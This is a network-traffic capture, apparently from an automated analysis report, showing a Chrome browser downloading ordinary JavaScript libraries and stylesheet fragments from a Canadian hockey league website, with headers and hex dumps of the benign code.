                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 72 65 66 72 65 73 68 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 35 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 2d 73 79 6e 63 2d 61 6c 65 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 36 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 2d 73 79 6e 63 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 37 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 2d 73 79 6e 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 38 27 7d 2e 7a 6d 64 69 2d 72 65 66 72 65 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 39 27 7d 2e 7a 6d 64 69 2d 72 6f 6c 6c 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 62 61 27 7d 2e 7a 6d 64 69 2d 72 75 6c 65 72
                                                                                                                          Data Ascii: refresh-alt:before{content:'\f1b5'}.zmdi-refresh-sync-alert:before{content:'\f1b6'}.zmdi-refresh-sync-off:before{content:'\f1b7'}.zmdi-refresh-sync:before{content:'\f1b8'}.zmdi-refresh:before{content:'\f1b9'}.zmdi-roller:before{content:'\f1ba'}.zmdi-ruler
                                                                                                                          2025-01-13 21:01:16 UTC1369INData Raw: 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 36 27 7d 2e 7a 6d 64 69 2d 74 61 62 2d 75 6e 73 65 6c 65 63 74 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 37 27 7d 2e 7a 6d 64 69 2d 74 61 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 38 27 7d 2e 7a 6d 64 69 2d 74 61 67 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 39 27 7d 2e 7a 6d 64 69 2d 74 61 67 2d 6d 6f 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 61 27 7d 2e 7a 6d 64 69 2d 74 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 62 27 7d 2e 7a 6d 64 69 2d 74 68 75 6d 62 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 66 31 64 63 27 7d 2e 7a 6d 64 69 2d 74 68 75 6d 62 2d 75
                                                                                                                          Data Ascii: ontent:'\f1d6'}.zmdi-tab-unselected:before{content:'\f1d7'}.zmdi-tab:before{content:'\f1d8'}.zmdi-tag-close:before{content:'\f1d9'}.zmdi-tag-more:before{content:'\f1da'}.zmdi-tag:before{content:'\f1db'}.zmdi-thumb-down:before{content:'\f1dc'}.zmdi-thumb-u


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.11.2049834137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC431OUTGET /app/themes/base/bower_components/lodash/lodash.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC521INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 50543
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Mon, 20 Jul 2015 18:25:53 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417824 960893449
                                                                                                                          Age: 82
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"55ad3d31-c56f"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:16 UTC15863INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 6c 6f 64 61 73 68 20 33 2e 31 30 2e 31 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 6c 6f 64 61 73 68 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 20 7c 20 55 6e 64 65 72 73 63 6f 72 65 2e 6a 73 20 31 2e 38 2e 33 20 75 6e 64 65 72 73 63 6f 72 65 6a 73 2e 6f 72 67 2f 4c 49 43 45 4e 53 45 0a 20 2a 20 42 75 69 6c 64 3a 20 60 6c 6f 64 61 73 68 20 6d 6f 64 65 72 6e 20 2d 6f 20 2e 2f 6c 6f 64 61 73 68 2e 6a 73 60 0a 20 2a 2f 0a 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 2c 74 29 7b 69 66 28 6e 21 3d 3d 74 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 3d 3d 3d 6e 2c 65 3d 6e 3d 3d 3d 77 2c 75 3d 6e 3d 3d 3d 6e 2c 6f 3d 6e 75 6c 6c 3d 3d 3d 74 2c 69 3d 74 3d 3d 3d 77 2c 66 3d 74 3d 3d 3d 74
                                                                                                                          Data Ascii: /** * @license * lodash 3.10.1 (Custom Build) lodash.com/license | Underscore.js 1.8.3 underscorejs.org/LICENSE * Build: `lodash modern -o ./lodash.js` */;(function(){function n(n,t){if(n!==t){var r=null===n,e=n===w,u=n===n,o=null===t,i=t===w,f=t===t
                                                                                                                          2025-01-13 21:01:16 UTC16384INData Raw: 76 61 72 20 66 3d 7a 6f 28 6e 29 2c 61 3d 66 2e 6c 65 6e 67 74 68 2c 63 3d 7a 6f 28 74 29 2e 6c 65 6e 67 74 68 3b 0a 69 66 28 61 21 3d 63 26 26 21 75 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 66 6f 72 28 63 3d 61 3b 63 2d 2d 3b 29 7b 76 61 72 20 6c 3d 66 5b 63 5d 3b 69 66 28 21 28 75 3f 6c 20 69 6e 20 74 3a 6e 75 2e 63 61 6c 6c 28 74 2c 6c 29 29 29 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 66 6f 72 28 76 61 72 20 73 3d 75 3b 2b 2b 63 3c 61 3b 29 7b 76 61 72 20 6c 3d 66 5b 63 5d 2c 70 3d 6e 5b 6c 5d 2c 68 3d 74 5b 6c 5d 2c 5f 3d 65 3f 65 28 75 3f 68 3a 70 2c 75 3f 70 3a 68 2c 6c 29 3a 77 3b 69 66 28 5f 3d 3d 3d 77 3f 21 72 28 70 2c 68 2c 65 2c 75 2c 6f 2c 69 29 3a 21 5f 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 73 7c 7c 28 73 3d 22 63 6f 6e 73 74 72 75 63 74
                                                                                                                          Data Ascii: var f=zo(n),a=f.length,c=zo(t).length;if(a!=c&&!u)return false;for(c=a;c--;){var l=f[c];if(!(u?l in t:nu.call(t,l)))return false}for(var s=u;++c<a;){var l=f[c],p=n[l],h=t[l],_=e?e(u?h:p,u?p:h,l):w;if(_===w?!r(p,h,e,u,o,i):!_)return false;s||(s="construct
                                                                                                                          2025-01-13 21:01:16 UTC16384INData Raw: 28 74 3d 77 29 2c 72 3d 2d 31 3b 66 6f 72 28 76 61 72 20 65 3d 7a 6f 28 6e 29 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 7b 7d 3b 2b 2b 72 3c 75 3b 29 7b 76 61 72 20 69 3d 65 5b 72 5d 2c 66 3d 6e 5b 69 5d 3b 74 3f 6e 75 2e 63 61 6c 6c 28 6f 2c 66 29 3f 6f 5b 66 5d 2e 70 75 73 68 28 69 29 3a 6f 5b 66 5d 3d 5b 69 5d 3a 6f 5b 66 5d 3d 69 7d 72 65 74 75 72 6e 20 6f 7d 2c 4e 6e 2e 69 6e 76 6f 6b 65 3d 61 6f 2c 4e 6e 2e 6b 65 79 73 3d 7a 6f 2c 4e 6e 2e 6b 65 79 73 49 6e 3d 52 65 2c 4e 6e 2e 6d 61 70 3d 75 65 2c 4e 6e 2e 6d 61 70 4b 65 79 73 3d 42 6f 2c 4e 6e 2e 6d 61 70 56 61 6c 75 65 73 3d 44 6f 2c 4e 6e 2e 6d 61 74 63 68 65 73 3d 4e 65 2c 4e 6e 2e 6d 61 74 63 68 65 73 50 72 6f 70 65 72 74 79 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 78
                                                                                                                          Data Ascii: (t=w),r=-1;for(var e=zo(n),u=e.length,o={};++r<u;){var i=e[r],f=n[i];t?nu.call(o,f)?o[f].push(i):o[f]=[i]:o[f]=i}return o},Nn.invoke=ao,Nn.keys=zo,Nn.keysIn=Re,Nn.map=ue,Nn.mapKeys=Bo,Nn.mapValues=Do,Nn.matches=Ne,Nn.matchesProperty=function(n,t){return x
                                                                                                                          2025-01-13 21:01:16 UTC1912INData Raw: 20 46 6e 3d 7b 7d 3b 46 6e 5b 42 5d 3d 46 6e 5b 44 5d 3d 46 6e 5b 4a 5d 3d 46 6e 5b 4d 5d 3d 46 6e 5b 71 5d 3d 46 6e 5b 58 5d 3d 46 6e 5b 48 5d 3d 46 6e 5b 51 5d 3d 46 6e 5b 6e 6e 5d 3d 46 6e 5b 74 6e 5d 3d 46 6e 5b 56 5d 3d 46 6e 5b 5a 5d 3d 46 6e 5b 59 5d 3d 46 6e 5b 47 5d 3d 46 6e 5b 72 6e 5d 3d 46 6e 5b 65 6e 5d 3d 46 6e 5b 75 6e 5d 3d 46 6e 5b 6f 6e 5d 3d 74 72 75 65 2c 46 6e 5b 50 5d 3d 46 6e 5b 4b 5d 3d 46 6e 5b 22 5b 6f 62 6a 65 63 74 20 4d 61 70 5d 22 5d 3d 46 6e 5b 22 5b 6f 62 6a 65 63 74 20 53 65 74 5d 22 5d 3d 46 6e 5b 22 5b 6f 62 6a 65 63 74 20 57 65 61 6b 4d 61 70 5d 22 5d 3d 66 61 6c 73 65 3b 76 61 72 20 4e 6e 3d 7b 22 5c 78 63 30 22 3a 22 41 22 2c 22 5c 78 63 31 22 3a 22 41 22 2c 22 5c 78 63 32 22 3a 22 41 22 2c 22 5c 78 63 33 22 3a 22 41
                                                                                                                          Data Ascii: Fn={};Fn[B]=Fn[D]=Fn[J]=Fn[M]=Fn[q]=Fn[X]=Fn[H]=Fn[Q]=Fn[nn]=Fn[tn]=Fn[V]=Fn[Z]=Fn[Y]=Fn[G]=Fn[rn]=Fn[en]=Fn[un]=Fn[on]=true,Fn[P]=Fn[K]=Fn["[object Map]"]=Fn["[object Set]"]=Fn["[object WeakMap]"]=false;var Nn={"\xc0":"A","\xc1":"A","\xc2":"A","\xc3":"A


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.11.2049835137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:15 UTC420OUTGET /app/themes/base/assets/scripts/js/slick.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC523INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 70274
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:12:32 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:19 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961417826 961775446
                                                                                                                          Age: 116
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069a0-11282"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:16 UTC15861INData Raw: 2f 2a 0a 20 20 20 20 20 5f 20 5f 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 5f 0a 20 5f 5f 5f 7c 20 28 5f 29 20 5f 5f 5f 7c 20 7c 20 5f 5f 20 20 28 5f 29 5f 5f 5f 0a 2f 20 5f 5f 7c 20 7c 20 7c 2f 20 5f 5f 7c 20 7c 2f 20 2f 20 20 7c 20 2f 20 5f 5f 7c 0a 5c 5f 5f 20 5c 20 7c 20 7c 20 28 5f 5f 7c 20 20 20 3c 20 5f 20 7c 20 5c 5f 5f 20 5c 0a 7c 5f 5f 5f 2f 5f 7c 5f 7c 5c 5f 5f 5f 7c 5f 7c 5c 5f 28 5f 29 2f 20 7c 5f 5f 5f 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7c 5f 5f 2f 0a 0a 20 56 65 72 73 69 6f 6e 3a 20 31 2e 35 2e 30 0a 20 20 41 75 74 68 6f 72 3a 20 4b 65 6e 20 57 68 65 65 6c 65 72 0a 20 57 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6b 65 6e 77 68 65 65 6c 65 72 2e 67 69 74 68 75 62 2e 69 6f 0a 20 20 20 20 44 6f 63 73 3a 20 68 74
                                                                                                                          Data Ascii: /* _ _ _ _ ___| (_) ___| | __ (_)___/ __| | |/ __| |/ / | / __|\__ \ | | (__| < _ | \__ \|___/_|_|\___|_|\_(_)/ |___/ |__/ Version: 1.5.0 Author: Ken Wheeler Website: http://kenwheeler.github.io Docs: ht
                                                                                                                          2025-01-13 21:01:16 UTC16384INData Raw: 6e 73 2e 64 72 61 67 67 61 62 6c 65 20 3d 3d 3d 20 74 72 75 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 2e 24 6c 69 73 74 2e 61 64 64 43 6c 61 73 73 28 27 64 72 61 67 67 61 62 6c 65 27 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 62 75 69 6c 64 52 6f 77 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 20 3d 20 74 68 69 73 2c 20 61 2c 20 62 2c 20 63 2c 20 6e 65 77 53 6c 69 64 65 73 2c 20 6e 75 6d 4f 66 53 6c 69 64 65 73 2c 20 6f 72 69 67 69 6e 61 6c 53 6c 69 64 65 73 2c 73 6c 69 64 65 73 50 65 72 53 65 63 74 69 6f 6e 3b 0a 0a 20 20 20 20 20 20 20 20 6e 65 77 53 6c 69 64 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61
                                                                                                                          Data Ascii: ns.draggable === true) { _.$list.addClass('draggable'); } }; Slick.prototype.buildRows = function() { var _ = this, a, b, c, newSlides, numOfSlides, originalSlides,slidesPerSection; newSlides = document.crea
                                                                                                                          2025-01-13 21:01:16 UTC16384INData Raw: 20 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 20 2b 20 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 20 3d 3d 3d 20 74 72 75 65 29 20 6d 61 78 20 3d 20 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 50 6f 69 6e 74 20 3d 20 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 20 2a 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 75 6e 74 65 72 20 3d 20 5f 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 20 2a 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 20 3d 20 5f 2e 73 6c 69 64 65 43 6f 75 6e 74 20 2a 20
                                                                                                                          Data Ascii: _.options.slidesToShow + 1; if (_.options.centerMode === true) max = _.slideCount; } else { breakPoint = _.options.slidesToScroll * -1; counter = _.options.slidesToScroll * -1; max = _.slideCount *
                                                                                                                          2025-01-13 21:01:16 UTC16384INData Raw: 76 61 72 20 74 61 72 67 65 74 48 65 69 67 68 74 20 3d 20 5f 2e 24 73 6c 69 64 65 73 2e 65 71 28 5f 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 2e 6f 75 74 65 72 48 65 69 67 68 74 28 74 72 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 2e 24 6c 69 73 74 2e 63 73 73 28 27 68 65 69 67 68 74 27 2c 20 74 61 72 67 65 74 48 65 69 67 68 74 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 4f 70 74 69 6f 6e 20 3d 20 53 6c 69 63 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 6b 53 65 74 4f 70 74 69 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 2c 20 76 61 6c 75 65 2c 20 72 65 66 72 65 73 68 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 20 3d 20 74 68 69
                                                                                                                          Data Ascii: var targetHeight = _.$slides.eq(_.currentSlide).outerHeight(true); _.$list.css('height', targetHeight); } }; Slick.prototype.setOption = Slick.prototype.slickSetOption = function(option, value, refresh) { var _ = thi
                                                                                                                          2025-01-13 21:01:16 UTC5261INData Raw: 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 65 76 65 6e 74 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 20 21 3d 3d 20 75 6e 64 65 66 69 6e 65 64 20 26 26 20 5f 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 77 69 70 65 4c 65 6e 67 74 68 20 3e 20 34 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 4f 66 66 73 65 74 20 3d 20 28 5f 2e 6f 70 74 69 6f 6e 73 2e 72 74 6c 20 3d 3d 3d 20 66 61 6c 73 65 20 3f 20 31 20 3a 20 2d 31 29 20 2a 20 28 5f 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 63 75 72 58 20 3e 20 5f 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 74 61 72 74 58 20 3f 20 31 20 3a 20 2d
                                                                                                                          Data Ascii: n; } if (event.originalEvent !== undefined && _.touchObject.swipeLength > 4) { event.preventDefault(); } positionOffset = (_.options.rtl === false ? 1 : -1) * (_.touchObject.curX > _.touchObject.startX ? 1 : -


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.11.2049836137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC634OUTGET /app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC520INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 8170
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Mon, 27 Jul 2015 13:58:05 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 960893674 961513529
                                                                                                                          Age: 82
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"55b638ed-1fea"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:16 UTC8170INData Raw: 2f 2a 21 20 52 65 61 63 74 4d 69 6e 69 52 6f 75 74 65 72 20 31 2e 31 2e 37 20 2d 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6c 61 72 72 79 6d 79 65 72 73 2f 72 65 61 63 74 2d 6d 69 6e 69 2d 72 6f 75 74 65 72 20 2a 2f 0a 76 61 72 20 52 65 61 63 74 4d 69 6e 69 52 6f 75 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 72 29 7b 69 66 28 6e 5b 72 5d 29 72 65 74 75 72 6e 20 6e 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 6e 5b 72 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 72 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 65 29 2c 6f 2e 6c 6f 61 64 65 64 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73
                                                                                                                          Data Ascii: /*! ReactMiniRouter 1.1.7 - https://github.com/larrymyers/react-mini-router */var ReactMiniRouter=function(t){function e(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return t[r].call(o.exports,o,o.exports,e),o.loaded=!0,o.exports


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.11.2049838137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC418OUTGET /app/plugins/wp-polls/polls-js.js?ver=2.7 HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC519INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 2994
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Fri, 05 Sep 2014 02:36:26 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971148 961417549
                                                                                                                          Age: 82
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"540921aa-bb2"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:16 UTC2994INData Raw: 76 61 72 20 70 6f 6c 6c 5f 69 64 3d 30 2c 70 6f 6c 6c 5f 61 6e 73 77 65 72 5f 69 64 3d 22 22 2c 69 73 5f 62 65 69 6e 67 5f 76 6f 74 65 64 3d 21 31 3b 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 6c 6f 61 64 69 6e 67 3d 70 61 72 73 65 49 6e 74 28 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 6c 6f 61 64 69 6e 67 29 3b 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 66 61 64 69 6e 67 3d 70 61 72 73 65 49 6e 74 28 70 6f 6c 6c 73 4c 31 30 6e 2e 73 68 6f 77 5f 66 61 64 69 6e 67 29 3b 0a 66 75 6e 63 74 69 6f 6e 20 70 6f 6c 6c 5f 76 6f 74 65 28 62 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 73 5f 62 65 69 6e 67 5f 76 6f 74 65 64 3f 61 6c 65 72 74 28 70 6f 6c 6c 73 4c 31 30 6e 2e 74 65 78 74 5f 77
                                                                                                                          Data Ascii: var poll_id=0,poll_answer_id="",is_being_voted=!1;pollsL10n.show_loading=parseInt(pollsL10n.show_loading);pollsL10n.show_fading=parseInt(pollsL10n.show_fading);function poll_vote(b){jQuery(document).ready(function(a){is_being_voted?alert(pollsL10n.text_w


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.11.2049837137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC624OUTGET /app/themes/base/bower_components/moment/min/moment-with-locales.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:16 UTC524INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:16 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 170649
                                                                                                                          Connection: close
